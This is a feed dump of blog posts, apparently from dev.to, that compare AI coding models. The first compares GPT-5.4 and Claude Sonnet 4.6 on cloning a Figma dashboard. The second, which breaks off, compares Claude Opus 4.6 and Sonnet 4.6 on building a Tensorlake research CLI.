&lt;p&gt;In this article, we take a quick look at OpenAI GPT-5.4, go through its official benchmarks, and then compare it in one small coding task against Anthropic’s general-purpose model, Claude Sonnet 4.6, to see how it actually performs.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;We briefly go over what GPT-5.4 is, what OpenAI is claiming with this model, and why it looks like one of their strongest all-rounder releases so far.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;We look at the official benchmarks around coding, reasoning, tool use, and computer-use capabilities to get an idea of how strong the model looks on paper.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;Instead of relying only on benchmarks, we also compare GPT-5.4 against Claude Sonnet 4.6 in one small, quick coding task (not enough to judge fully, but still...).&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Brief on OpenAI GPT-5.4
&lt;/h2&gt;

&lt;p&gt;So, before we jump into the coding test, let me give you a quick brief on GPT-5.4, because this is one of OpenAI’s biggest model releases in a while.&lt;/p&gt;

&lt;p&gt;OpenAI released GPT-5.4 on March 5, 2026, and they are positioning it as their most capable and efficient frontier model for professional work.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgjgdtgurct57gfvfsblk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgjgdtgurct57gfvfsblk.png" alt="OpenAI claiming gpt 5.4 is good at frontend"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;What makes this model interesting is that OpenAI is not selling it as just a coding model, and not just a reasoning model either. They are basically pitching it as an &lt;strong&gt;all-round professional work&lt;/strong&gt; model that combines strong reasoning, strong coding, better tool use, and much better performance on practical work like spreadsheets, presentations, etc.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfmlidftq907s3rk2c1l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfmlidftq907s3rk2c1l.png" alt="Sam Altman claiming the model is good at real life tasks like working with spreadsheets"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Honestly, this part matters more than it sounds. A lot of real AI work is not just prompting or writing code, it is dealing with PDFs, spreadsheets, slides, and all kinds of unstructured data. That is also where something like &lt;a href="https://tensorlake.ai" rel="noopener noreferrer"&gt;Tensorlake&lt;/a&gt; makes sense, because it helps turn that mess into something models can actually work with.&lt;/p&gt;

&lt;p&gt;And the specs are also pretty wild. GPT-5.4 supports a &lt;strong&gt;1.05M token&lt;/strong&gt; context window with 128K max output tokens, which is pretty good room to work with. All in all, this helps the model remember things better. Also, a thing to note is that the knowledge cutoff for this model is &lt;strong&gt;August 31, 2025&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Now, let's talk about the part we mostly care about.&lt;/p&gt;

&lt;p&gt;On the official OpenAI benchmarks, &lt;strong&gt;GPT-5.4 scores 57.7% on SWE-Bench Pro (Public)&lt;/strong&gt;, which puts it basically side by side with GPT-5.3-Codex, a coding-focused model, at &lt;strong&gt;56.8%&lt;/strong&gt;. So yes, OpenAI says this general-purpose model is slightly better than GPT-5.3-Codex, a coding-focused model, which I personally have not had the best experience with compared to Claude models, and that is kind of wild to think about.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn6yjg9ftpq3vexntmndl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn6yjg9ftpq3vexntmndl.png" alt="gpt 5.4 benchmark"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;OpenAI says GPT-5.4 is their &lt;strong&gt;first general-purpose model with native computer-use capabilities&lt;/strong&gt;, which is a pretty big deal. That means it is built not just to generate text or code, but also to operate across software, work from screenshots, and handle more agent-like workflows. On &lt;strong&gt;OSWorld-Verified&lt;/strong&gt;, it scores &lt;strong&gt;75.0%&lt;/strong&gt;, which OpenAI says is above human performance on that benchmark. 🤯&lt;/p&gt;

&lt;p&gt;One thing I also like here is that OpenAI is claiming GPT-5.4 is their &lt;strong&gt;most factual model yet&lt;/strong&gt;. It is said to be 18% less likely to contain any errors compared to GPT-5.2.&lt;/p&gt;

&lt;p&gt;For API developers, pricing matters, of course.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5667dzgr6es7701tau2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5667dzgr6es7701tau2.png" alt="gpt 5.4 pricing"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The standard &lt;strong&gt;GPT-5.4&lt;/strong&gt; model is listed at &lt;strong&gt;$2.50 per 1M input tokens&lt;/strong&gt;, &lt;strong&gt;$0.25 cached input&lt;/strong&gt;, and &lt;strong&gt;$15 per 1M output tokens&lt;/strong&gt;. &lt;strong&gt;GPT-5.4 Pro&lt;/strong&gt; is way more expensive at &lt;strong&gt;$30 input&lt;/strong&gt; and &lt;strong&gt;$180 output per 1M tokens&lt;/strong&gt;, and OpenAI says it can take several minutes on hard tasks, so that one is clearly for cases where you really want the best answer and are okay paying for it.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 The normal GPT-5.4 model is probably the one most people will actually care about day to day, and that's what I'd prefer.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;And as always, benchmarks are benchmarks. But on paper at least, GPT-5.4 looks like one of the strongest all-rounder models OpenAI has shipped so far.&lt;/p&gt;




&lt;h2&gt;
  
  
  Quick Coding Test
&lt;/h2&gt;

&lt;p&gt;As this is a general-purpose model instead of a coding-tuned model, comparing the model's ability solely on coding is just not fair. But as developers, we mostly care about how good the model is at coding anyway, so just to give you an idea of how this model performs, we will do a quick test.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6l1l9xllt29e4rzqakqa.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6l1l9xllt29e4rzqakqa.png" alt="gpt 5.4 benchmark compared to 5.3 codex"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, there's not much difference in SWE-Bench between GPT-5.4 and GPT-5.3-Codex:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.4&lt;/strong&gt;: Latency (s): 1,053, Accuracy: 57.7%, Effort: xhigh&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.3-Codex&lt;/strong&gt;: Latency (s): 1,114, Accuracy: 57.2%, Effort: xhigh&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;But to give you an idea of what to expect from this model in coding, I will run one small, quick test.&lt;/p&gt;

&lt;p&gt;Let's take two general models, one from Anthropic, Claude Sonnet 4.6, and one from OpenAI, GPT-5.4, &lt;strong&gt;not pro&lt;/strong&gt;, and compare them against each other to show the difference in their coding skills.&lt;/p&gt;

&lt;p&gt;For the test, we will use the following CLI coding agents:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Sonnet 4.6:&lt;/strong&gt; Claude Code (Anthropic’s terminal-based agentic coding tool)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenAI GPT-5.4:&lt;/strong&gt; Codex CLI&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;As GPT-5.4 is said to be strong in frontend, why not test it on frontend itself?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa3mnuibaxl0c6acx4npd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa3mnuibaxl0c6acx4npd.png" alt="gpt 5.4 frontend claim"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Test: Figma Design Clone with MCP
&lt;/h3&gt;

&lt;p&gt;In this test, we'll be comparing both models on a Figma design, a complex dashboard with so many things happening in the UI.&lt;/p&gt;

&lt;p&gt;Here's the Figma design that I'll ask both models to clone:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;Prompt:

Build a &lt;span class="gs"&gt;**pixel-accurate clone**&lt;/span&gt; of the attached Figma design frame using the &lt;span class="gs"&gt;**provided Next.js project**&lt;/span&gt; as the starting point. Do &lt;span class="gs"&gt;**not**&lt;/span&gt; create a new project. Instead, implement the UI inside the existing codebase.

https://www.figma.com/design/8quNKljV0spv67VAGsA75D/Dashboard-Design-Concept--Community---Copy-?node-id=69-123&amp;amp;t=Tvu2UB7UDMqkvPRb-4

Please match the design as closely as possible, with close attention to layout, spacing, alignment, typography, colors, borders, shadows, corner radius, and overall visual balance.

Requirements:
&lt;span class="p"&gt;
*&lt;/span&gt; use the existing &lt;span class="gs"&gt;**Next.js**&lt;/span&gt; setup
&lt;span class="p"&gt;*&lt;/span&gt; keep the code clean and componentized
&lt;span class="p"&gt;*&lt;/span&gt; make the page responsive without changing the intended design
&lt;span class="p"&gt;*&lt;/span&gt; use semantic HTML where appropriate
&lt;span class="p"&gt;*&lt;/span&gt; avoid adding your own design decisions unless necessary
&lt;span class="p"&gt;*&lt;/span&gt; if any part of the design is unclear, make the most reasonable choice and stay visually consistent

Prioritize &lt;span class="gs"&gt;**design accuracy first**&lt;/span&gt;, then code quality.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  GPT-5.4
&lt;/h4&gt;

&lt;p&gt;GPT-5.4 pretty much one-shotted the entire implementation in one go, which was honestly nice to see. It did not need any follow-up prompt, no fixing, nothing. It just took the Figma frame through MCP and started building the whole thing right away.&lt;/p&gt;

&lt;p&gt;The final result actually looked decent. I would not call it pixel-perfect by any means, but compared to Claude Sonnet 4.6, I’d say the implementation looked noticeably better overall. The whole thing feels more like a static picture of the design than an interface you can actually interact with.&lt;/p&gt;

&lt;p&gt;Time-wise, it took roughly &lt;strong&gt;5 minutes&lt;/strong&gt; to get to a working to the working build.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/4yxzh0qxm5c"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/f6edd67c32037c0a69def1b10985855d" rel="noopener noreferrer"&gt;GPT-5.4 Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Token usage looked like this:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Total Token Usage:&lt;/strong&gt; 166,501&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input Token Usage:&lt;/strong&gt; 151,595&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cached Input Tokens:&lt;/strong&gt; 1,291,776&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 14,906&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reasoning Tokens:&lt;/strong&gt; 1,479&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And the following code changes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 3 files changed, 803 insertions(+), 82 deletions(-)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To be honest, I still would not say this is the kind of code implementation you can just ship straight to production and call it done. But for a one-shot frontend clone from a Figma frame, this was a pretty solid attempt.&lt;/p&gt;
&lt;h4&gt;
  
  
  Claude Sonnet 4.6
&lt;/h4&gt;

&lt;p&gt;Claude Sonnet 4.6 went straight into the implementation right away. It did run into an issue at first, not really a build error, but more of one of those annoying &lt;strong&gt;Next.js image gotchas&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kdi2h66gcdz807p0kom.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kdi2h66gcdz807p0kom.png" alt="claude sonnet 4.6 image impl error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After that, I gave it a quick follow-up prompt, and almost instantly, it fixed the issue and came back with a decent implementation.&lt;/p&gt;

&lt;p&gt;As you’d expect, it did manage to clone the project structure and get the UI in place. And again, the same issue, there's just no functionality whatsoever. It just feels like a picture with no interactivity.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/L9l8cGBvC1U"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/61d485a452f2aab8eb41ceaa31ddd9f9" rel="noopener noreferrer"&gt;Claude Sonnet 4.6 Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Time-wise, it took &lt;strong&gt;9 minutes 56 seconds&lt;/strong&gt; to get to a working result, and the follow-up fix was pretty much instant.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq0ugjnobb005rsla4bnr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq0ugjnobb005rsla4bnr.png" alt="implementation checklist"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Token usage, based on Claude Code’s model stats, looked like this:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Input Token Usage:&lt;/strong&gt; 84&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 35.4K&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgof5gb4r1ufiy1vpwpa4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgof5gb4r1ufiy1vpwpa4.png" alt="token usage"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And the following code changes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 10 files changed, 1017 insertions(+), 84 deletions(-)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To be honest, I’m not really impressed, but I’m not disappointed either. The result feels pretty neutral overall. It was able to use tools, get fairly close to the UI, and produce something usable for comparison, but the implementation itself feels a bit weird and not all that convincing.&lt;/p&gt;


&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;So, after all the benchmarks, claims, and hype, I think the fairest takeaway is this: GPT-5.4 looks very strong on paper, and for a lot of people it works and is an upgrade, but it still doesn’t seem like it is the best model you can get for coding.&lt;/p&gt;

&lt;p&gt;So yeah, I’d say GPT-5.4 is probably one of the strongest all-rounder models OpenAI has shipped so far, but whether it beats Claude, be it Sonnet or Opus, for coding in real usage is still something you’ll want to judge from your actual hands-on testing, not just benchmarks.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5t6hnxig38el1bsey06l.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5t6hnxig38el1bsey06l.gif" alt="slect random gif"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And honestly, that’s the real takeaway here anyway.&lt;/p&gt;

&lt;p&gt;These models keep getting better at a speed that is honestly hard to keep up with. So rather than getting too stuck on who won one benchmark, the better thing to do is probably to keep building, keep testing, and keep learning how to use these models better for your use case.&lt;/p&gt;

&lt;p&gt;What do you think, is GPT-5.4 actually that good, or is Claude still your go-to? 👇&lt;/p&gt;


&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;



</description>
      <category>ai</category>
      <category>programming</category>
      <category>productivity</category>
      <category>webdev</category>
    </item>
    <item>
      <title>🔥Claude Opus 4.6 vs. Sonnet 4.6 Coding Comparison ✅</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Thu, 05 Mar 2026 14:04:59 +0000</pubDate>
      <link>https://forem.com/tensorlake/claude-opus-46-vs-sonnet-46-coding-comparison-55jn</link>
      <guid>https://forem.com/tensorlake/claude-opus-46-vs-sonnet-46-coding-comparison-55jn</guid>
      <description>&lt;p&gt;Anthropic recently dropped the updated &lt;strong&gt;Claude 4.6&lt;/strong&gt; lineup, and as usual, the two names everyone cares about are &lt;strong&gt;Opus 4.6&lt;/strong&gt; and &lt;strong&gt;Sonnet 4.6&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Opus is the expensive “best possible” model, and Sonnet is the cheaper, more general one that a lot of people actually use day to day. So I wanted to see what the real gap looks like when you ask both to build something serious, not a toy demo.&lt;/p&gt;

&lt;p&gt;Benchmark-wise, there’s a difference of course, but it doesn’t look that huge when it comes to SWE and agentic coding.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fumytppa0wbbydq6y6oxq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fumytppa0wbbydq6y6oxq.png" alt="Claude Opus 4.6 vs. Claude Sonnet 4.6 Benchmark comparison"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I kept it super basic: one test (but a big one), same prompt, same workflow. I just compared how close they got without me stepping in.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; Don’t take the result of this test as a hard rule. This is just one real-world coding task, run in my setup, to give you a feel for how these two models performed for me.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you just want the takeaway, here’s the deal with these models:&lt;/p&gt;

&lt;p&gt;First, &lt;strong&gt;Opus 4.6 is the peak for coding right now&lt;/strong&gt;. At the time of writing, it’s basically the OG, and nothing else comes that close.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Opus 4.6&lt;/strong&gt; had a cleaner run. It hit a test failure too, but fixed it fast, shipped a working CLI + Tensorlake integration, and did it with way fewer tokens. Rough API-equivalent cost (output only) came out around ~$1.00, which is kind of wild for how big the project is.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Claude Sonnet 4.6&lt;/strong&gt; Surprisingly close for a cheaper, more general model. It built most of the project and the CLI was mostly fine, but it ran into the same issue as Opus and couldn’t fully recover. Even after an attempted fix, Tensorlake integration still didn’t work. Output-only cost was about ~$0.87, but it used way more time and tokens overall to get there.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 Obviously, this isn’t a test to “compare” the two head-to-head. It’s just to see the difference in code quality. In general, there’s never really been a fair comparison between Opus and Sonnet since their very first launch, Opus has always been on another level.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Test Workflow
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ &lt;strong&gt;NOTE:&lt;/strong&gt; Before we start this test, I just want to clarify one thing. I'm not doing this test to compare whether Sonnet 4.6 is better than Opus 4.6 for coding, because obviously Opus 4.6 is a lot better. This is to give you an idea of how well Opus 4.6 performs compared to Sonnet.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;For the test, we will use everyone's favorite CLI coding agent, &lt;strong&gt;Claude Code&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;As both models are from Anthropic, it works best for both and is &lt;strong&gt;not biased&lt;/strong&gt; toward either.&lt;/p&gt;

&lt;p&gt;We will test both models on one decently complex task:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Task:&lt;/strong&gt; Build a complete Tensorlake project in Python called &lt;code&gt;research_pack&lt;/code&gt;, a “Deep Research Pack” generator that turns a topic into:&lt;/li&gt;
&lt;li&gt;a citation-backed &lt;strong&gt;Markdown report&lt;/strong&gt;, and&lt;/li&gt;
&lt;li&gt;a machine-readable &lt;strong&gt;source library JSON&lt;/strong&gt; with extracted text, metadata, summaries, you get the idea.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It also has to ship a nice CLI called &lt;strong&gt;&lt;code&gt;research-pack&lt;/code&gt;&lt;/strong&gt; with commands like:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;research-pack run "&amp;lt;topic&amp;gt;"&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;research-pack status &amp;lt;run_id&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;research-pack open &amp;lt;run_id&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We’ll compare the overall feel, code quality, token usage, cost, and time to complete the build.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; Just like my previous tests, I’ll share each model’s changes as a &lt;code&gt;.patch&lt;/code&gt; file so you can reproduce the exact result locally with &lt;code&gt;git apply &amp;lt;file.patch&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Why Tensorlake?
&lt;/h3&gt;

&lt;p&gt;Tensorlake is a solid choice for this Opus 4.6 vs Sonnet 4.6 test because it is a real platform with enough complexity to quickly show whether a model can actually build something end to end. It has an agent runtime with durable execution, sandboxed code execution, and built in observability, so the test is not just writing a few functions, it is wiring up a production workflow.&lt;/p&gt;

&lt;p&gt;And selfishly, it is also a good dogfood moment. 👀 If a model can spin up a Tensorlake project from scratch and get it working, that is a pretty strong sign for two things: these recent models are getting scary good and how usable Tensorlake is for building serious agent style pipelines.&lt;/p&gt;




&lt;h2&gt;
  
  
  Coding Tests
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Test: Deep Research Agent
&lt;/h3&gt;

&lt;p&gt;For this test, both models had to build the &lt;code&gt;research_pack&lt;/code&gt; Tensorlake project in Python. The goal was simple: give it a topic, it crawls stuff, figures out sources, improves them, and spits out:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;report.md&lt;/code&gt; with &lt;code&gt;[S1]&lt;/code&gt; style citations&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;library.json&lt;/code&gt; with the full source library&lt;/li&gt;
&lt;li&gt;a clean CLI: &lt;code&gt;research-pack run/status/open&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;plus Tensorlake deploy support so you can trigger it as an app, not just locally&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can find the prompt I’ve used here: &lt;a href="https://gist.github.com/shricodev/4a47d65ec12229bdfda2b836b226eb50" rel="noopener noreferrer"&gt;Research Agent Prompt&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;One thing that went a bit crazy is that both models ran into basically the &lt;strong&gt;exact same/similar issue&lt;/strong&gt; during the run.&lt;/p&gt;

&lt;p&gt;That shows how similarly these models can behave, which is kind of creepy. If you give them the exact same task and constraints, they’ll often make similar choices. I wanted to call that out because you might’ve noticed the same pattern too.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fieqnz7blm1i18d4ypxg5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fieqnz7blm1i18d4ypxg5.png" alt="AI models behaving similarly"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Not surprisingly, &lt;strong&gt;Opus fixed it much faster and with way fewer tokens&lt;/strong&gt;. Sonnet took longer, burned a lot more context trying to debug it, and even after the fix pass, it still didn’t fully work.&lt;/p&gt;




&lt;h3&gt;
  
  
  Claude Opus 4.6
&lt;/h3&gt;

&lt;p&gt;Opus was pretty straightforward.&lt;/p&gt;

&lt;p&gt;It did hit a failure while running tests, but it was a quick fix. After that, everything looked clean: CLI worked, offline mode worked, and overall all the feature flags seem to work perfectly.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fatt1ijsaq7uy4d380p2o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fatt1ijsaq7uy4d380p2o.png" alt="Opus 4.6 project build error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here’s the acceptance checklist it generated at the end, I really love it as it created this after making sure all tests pass, and everything is in place, that's how it's done.&lt;/p&gt;

